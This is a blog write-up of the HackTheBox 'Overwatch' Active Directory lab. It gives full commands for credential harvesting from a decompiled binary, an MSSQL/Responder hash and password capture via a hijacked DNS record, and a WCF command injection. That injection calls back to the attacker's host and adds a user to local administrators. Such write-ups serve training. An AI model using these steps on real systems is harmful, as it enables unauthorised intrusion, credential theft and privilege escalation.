MysticHackersBlog

Overwatch WriteUp - HackTheBox


Overwatch is a medium-difficulty Windows Active Directory machine that requires careful enumeration and analysis across multiple layers of the environment. Progression depends on identifying weaknesses in custom applications, leveraging misconfiguration in enterprise services, and pivoting through internal components to achieve full domain compromise.


ENUMERATION

NMAP

We kick things off with an nmap scan.

sudo nmap -sVC --min-rate 1000 10.129.1.x -p-
Nmap scan report for 10.129.1.x
Host is up (0.29s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-18 17:43:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: OVERWATCH
|   NetBIOS_Domain_Name: OVERWATCH
|   NetBIOS_Computer_Name: S200401
|   DNS_Domain_Name: overwatch.htb
|   DNS_Computer_Name: S200401.overwatch.htb
|   DNS_Tree_Name: overwatch.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2026-02-18T17:44:59+00:00
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after:  2026-06-08T15:16:06
|_ssl-date: 2026-02-18T17:45:40+00:00; -5h29m57s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2026-02-18T17:45:41+00:00; -5h29m56s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-02-18T17:40:21
|_Not valid after:  2056-02-18T17:40:21
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
62157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
62158/tcp open  msrpc         Microsoft Windows RPC
64717/tcp open  msrpc         Microsoft Windows RPC
64745/tcp open  tcpwrapped
64788/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=2/19%Time=699647B0%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -5h29m56s, deviation: 0s, median: -5h29m57s
| smb2-time: 
|   date: 2026-02-18T17:44:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 404.62 seconds

The scan reveals crucial information about the machine:

  • From the services running on the machine, it is quite evidently an Active Directory machine.
  • The domain name is overwatch and the computer name is S200401.
  • The machine hosts a DNS server, SMB server, NTP server and MS-SQL server.
  • There is a time difference between our machine and the target machine.

We know the server has SMB running due to the 2 open ports: 445 (Modern implementation for SMB over TCP/IP) and 139 netbios-ssn (NetBIOS Session Service used to support older implementations of SMB over NetBIOS).

Before proceeding any further, it is imperative we add the hostnames to /etc/hosts for name resolution.

echo "10.129.1.x  S200401.overwatch.htb overwatch.htb" | sudo tee -a /etc/hosts

Next, we fix the clock skew.

sudo ntpdate overwatch.htb

SMBCLIENT

Listing the SMB shares on the machine reveals an unprotected software$ share.

smbclient -L overwatch.htb -U guest
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	software$       Disk      
	SYSVOL          Disk      Logon server share 

smbclient can also be used to browse through the share.

smbclient '\\overwatch.htb\software$' -U guest
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DH        0  Sat May 17 06:57:07 2025
  ..                                DHS        0  Thu Jan  1 12:16:47 2026
  Monitoring                         DH        0  Sat May 17 07:02:43 2025
cd Mon
		7147007 blocks of size 4096. 1831880 blocks available
smb: \> cd Monitoring
smb: \Monitoring\> ls
  .                                  DH        0  Sat May 17 07:02:43 2025
  ..                                 DH        0  Sat May 17 06:57:07 2025
  EntityFramework.dll                AH  4991352  Fri Apr 17 02:08:42 2020
  EntityFramework.SqlServer.dll      AH   591752  Fri Apr 17 02:08:56 2020
  EntityFramework.SqlServer.xml      AH   163193  Fri Apr 17 02:08:56 2020
  EntityFramework.xml                AH  3738289  Fri Apr 17 02:08:40 2020
  Microsoft.Management.Infrastructure.dll     AH    36864  Mon Jul 17 20:16:10 2017
  overwatch.exe                      AH     9728  Sat May 17 06:49:24 2025
  overwatch.exe.config               AH     2163  Sat May 17 06:32:30 2025
  overwatch.pdb                      AH    30208  Sat May 17 06:49:24 2025
  System.Data.SQLite.dll             AH   450232  Mon Sep 30 02:11:18 2024
  System.Data.SQLite.EF6.dll         AH   206520  Mon Sep 30 02:10:06 2024
  System.Data.SQLite.Linq.dll        AH   206520  Mon Sep 30 02:10:42 2024
  System.Data.SQLite.xml             AH  1245480  Sun Sep 29 00:18:00 2024
  System.Management.Automation.dll     AH   360448  Mon Jul 17 20:16:10 2017
  System.Management.Automation.xml     AH  7145771  Mon Jul 17 20:16:10 2017
  x64                                DH        0  Sat May 17 07:02:33 2025
  x86                                DH        0  Sat May 17 07:02:33 2025

		7147007 blocks of size 4096. 1831880 blocks available

The Monitoring folder contains library and configuration files for overwatch.exe which seems to be .NET software developed in-house. We go on to download all the files within this folder.

smb: \Monitoring\> prompt OFF; mget *

We could have just downloaded overwatch.exe, overwatch.exe.config and overwatch.pdb` as the rest of the files are standard windows files.

Examining overwatch.exe.config reveals an internal Monitoring Service running on overwatch.htb with an API hosted at http://overwatch.htb:8000/MonitorService. It also contains the PublicKeyToken.

less overwatch.exe.config

config file

ILSPY

To examine the overwatch.exe file to search for potential hardcoded credentials, we use ilspycmd.

ilspycmd overwatch.exe > output

decompiled code

As anticipated, the output reveals the password to sqlsvc.

We also find a public string KillProcess(string ProcessName) function that has command injection. (This might come in handy later on)

NETEXEC

The access that the sqlsvc account has can be checked using netexec.

nxc ldap overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv'

  LDAP        10.129.3.x      389    S200401          [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb) (signing:None) (channel binding:No TLS cert)
  LDAP        10.129.3.x      389    S200401          [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv 
nxc winrm overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv'

  WINRM       10.129.3.x      5985   S200401          [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb) 
  WINRM       10.129.3.x      5985   S200401          [-] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv

Apparently, sqlsvc has access to LDAP access but not WinRM.


FOOTHOLD

Earlier, the nmap scan revealed an MS-SQL server running on port 6520 and decompiling the overwatch.exe file exposed the credentials of the sqlsvc account.

IMPACKET-MSSQCLIENT

We connect as sqlsvc using mssqlclient.py.

mssqlclient.py sqlsvc:'TI0LKcfHzZw1Vv'@overwatch.htb -windows-auth -p 6520

Running basic commands reveal that we are not able to use xp_cmdshell but can use xp_dirtree. We also find a linked server: SQL07.

SQL (OVERWATCH\sqlsvc  guest@master)> xp_dirtree

  subdirectory                depth   file   
  -------------------------   -----   ----   
  $Recycle.Bin                    1      0   

  $WinREAgent                     1      0   
  <Truncated />
SQL (OVERWATCH\sqlsvc  guest@master)> xp_cmdshell whoami

  ERROR(S200401\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (OVERWATCH\sqlsvc  guest@master)> enum_impersonate

  execute as   database   permission_name   state_desc   grantee   grantor   
  ----------   --------   ---------------   ----------   -------   -------   
SQL (OVERWATCH\sqlsvc  guest@master)> enum_logins

  name               type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
  ----------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
  sa                 SQL_LOGIN                 1          1               0             0            0              0           0           0           0   

  BUILTIN\Users      WINDOWS_GROUP             0          0               0             0            0              0           0           0           0   

  OVERWATCH\sqlsvc   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   
SQL (OVERWATCH\sqlsvc  guest@master)> enum_links

  SRV_NAME             SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE       SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
  ------------------   ----------------   -----------   ------------------   ------------------   ------------   -------   
  S200401\SQLEXPRESS   SQLNCLI            SQL Server    S200401\SQLEXPRESS   NULL                 NULL           NULL      

  SQL07                SQLNCLI            SQL Server    SQL07                NULL                 NULL           NULL      

  Linked Server   Local Login   Is Self Mapping   Remote Login   
  -------------   -----------   ---------------   ------------   

Next, we try to capture the hash using Responder through xp_dirtree.

RESPONDER

Fire up Responder.

sudo Responder -I tun0

And, connect to our machine using the mssqlclient's xp_dirtree command.

SQL (OVERWATCH\sqlsvc  guest@master)> xp_dirtree \\10.10.16.x\toshith

We obtain the hash of the S200401 machine account through Responder. Machine Account Hash

Next, we try using the linked server found earlier.

SQL (OVERWATCH\sqlsvc  guest@master)> use_link sql07

  INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "sql07" returned message "Login timeout expired".
  INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "sql07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
  ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64]. 

This gives a network error. We check the data source of SQL07 which could reveal IP address or domain.

SQL (OVERWATCH\sqlsvc  guest@master)> SELECT name, data_source FROM sys.servers WHERE name = 'sql07'

  name    data_source   
  -----   -----------   
  SQL07   SQL07         

Apparently, the IP address is not specified and it uses just the Domain name to connect to the server.

BLOODY-AD

We can check the machine's dns records using bloodyAD to check for the linked server as we had LDAP access as sqlsvc.

bloodyAD --host overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv' get dnsDump

The records do not show any entry for SQL07.

Checking for the permissions the sqlsvc account has, we find we can add a DNS record.

bloodyAD --host overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv' get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

distinguishedName: DC=SQL07,DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: WRITE
OWNER: WRITE
DACL: WRITE

distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

We use bllodyAD itself to add the DNS record pointing to our IP address for SQL07.

bloodyAD --host overwatch.htb -u sqlsvc -p 'TI0LKcfHzZw1Vv' add dnsRecord SQL07 10.10.16.x

And finally, we make the MS-SQL server authenticate to Responder running on our machine.

SQL (OVERWATCH\sqlsvc  guest@master)> use_link sql07

This reveals the clear text password for sqlmgmt.

SQL Mgmt password

USER FLAG

We check for access that the newly discovered sqlmgmt account has, and discover that WinRM is accessible.

nxc winrm overwatch.htb -u sqlmgmt -p '...'

  WINRM       10.129.3.4      5985   S200401          [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb)
  WINRM       10.129.3.4      5985   S200401          [+] overwatch.htb\sqlmgmt:bIhBbzMMnB82yx (Pwn3d!)

EVIL-WINRM

We connect to the machine as sqlmgmt using evil-wirm.

evil-winrm -i overwatch.htb -u sqlmgmt -p '...'

The user flag can be found in the Desktop directory. User Flag

Privilege Escalation

Moving forward, we check the URL that was listed in the overwatch.exe.config file.

evil-winrm-py PS C:\Users\sqlmgmt\Desktop> curl -UseBasicParsing 'http://overwatch.htb:8000/MonitorService'


StatusCode        : 200
StatusDescription : OK
Content           : <HTML lang="en"><HEAD><link rel="alternate" type="text/xml" 
                    href="http://overwatch.htb:8000/MonitorService?disco"/><STYLE type="text/css">#content{ FONT-SIZE: 
                    0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: ...
RawContent        : HTTP/1.1 200 OK
                    Content-Length: 3077
                    Content-Type: text/html; charset=UTF-8
                    Date: Wed, 01 May 2026 14:45:20 GMT
                    Server: Microsoft-HTTPAPI/2.0
                    
                    <HTML lang="en"><HEAD><link rel="alternate" type="t...

From the config file, we get an idea that MonitoringService uses WCF Framework

To verify, we check if the service responds to the wsdl parameter.

evil-winrm-py PS C:\Users\sqlmgmt\Desktop> curl -UseBasicParsing 'http://overwatch.htb:8000/MonitorService?wsdl'


StatusCode        : 200
StatusDescription : OK
Content           : <?xml version="1.0" encoding="utf-8"?><wsdl:definitions name="MonitoringService" 
                    targetNamespace="http://tempuri.org/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" 
                    xmlns:wsx="http://schemas.xmlsoap.o...
RawContent        : HTTP/1.1 200 OK
                    Content-Length: 4478
                    Content-Type: text/xml; charset=UTF-8
                    Date: Wed, 01 May 2026 14:51:29 GMT
                    Server: Microsoft-HTTPAPI/2.0
                    
                    <?xml version="1.0" encoding="utf-8"?><wsdl:definiti...
....

We can get more info about the parameters that can be used through this page.

evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $(curl -UseBasicParsing 'http://overwatch.htb:8000/MonitorService?wsdl').RawContent

image

Note the parameter KillProcess, we had earlier found, how this was vulnerable to command injection.

To use this WCF process and exploit it, we first register it as a WebServiceProxy.

evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $client = New-WebServiceProxy -Uri 'http://overwatch.htb:8000/MonitorService?wsdl' -Namespace "
WcfProxy"

To make sure everything works, we first start a python http server (python3 -m http.server) on our machine then try curl to get a hit on it from the windows machine.

evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $client.KillProcess("x;curl -UseBasicParsing http://10.10.16.x:8000/test;")
Error:         
        Error response
    
        Error response
        Error code: 404
        Message: File not found.
        Error code explanation: 404 - Nothing matches the given URI.

And indeed, the command injection worked.

python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.8.x - - [01/Jun/2026 20:48:34] code 404, message File not found
10.129.8.x - - [01/Jun/2026 20:48:34] "GET /test HTTP/1.1" 404 -

Since this is a privileged process, we can simply add the sqlmgmt user to local admins using this vulnerability.

evil-winrm-py PS C:\Users\sqlmgmt\Desktop> $client.KillProcess("x;net localgroup administrators sqlmgmt /add;")
Error: The term '-Force' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
evil-winrm-py PS C:\Users\sqlmgmt\Desktop> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
sqlmgmt
The command completed successfully.

And Viola! we have Administrator privileges on this machine.

ROOT FLAG

We can restart the winrm session to read the flag. Root Flag

This concludes the Overwatch machine.